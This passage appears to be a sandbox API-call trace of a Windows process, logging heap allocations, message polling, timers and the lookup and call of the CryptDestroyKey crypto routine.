[0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0262.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0262.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0262.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0262.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0262.947] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0262.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0262.947] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0262.948] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0262.948] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0262.948] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.949] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.949] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0262.949] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.949] WriteFile (in: hFile=0x2d0, lpBuffer=0x2e561a8*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2e561a8*, lpNumberOfBytesWritten=0x8cf5e4*=0x198, lpOverlapped=0x0) returned 1 [0262.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0262.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0262.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0262.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.952] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0262.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0262.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.952] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0262.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0262.952] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0262.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0262.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0262.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0262.953] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0262.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0262.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0262.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.953] CryptDestroyKey (hKey=0xa87310) returned 1 [0262.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0262.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0262.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0262.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0262.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0262.955] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0262.956] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.956] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0262.956] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0262.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0262.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0262.956] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0262.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0262.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0262.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0262.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0262.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0263.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0263.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0263.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0263.036] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 1 [0263.036] TranslateMessage (lpMsg=0x8ceee0) returned 0 [0263.036] DispatchMessageW (lpMsg=0x8ceee0) returned 0x0 [0263.036] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0263.036] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0263.036] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0263.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0263.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.036] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0263.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0263.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0263.037] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.037] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0263.037] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 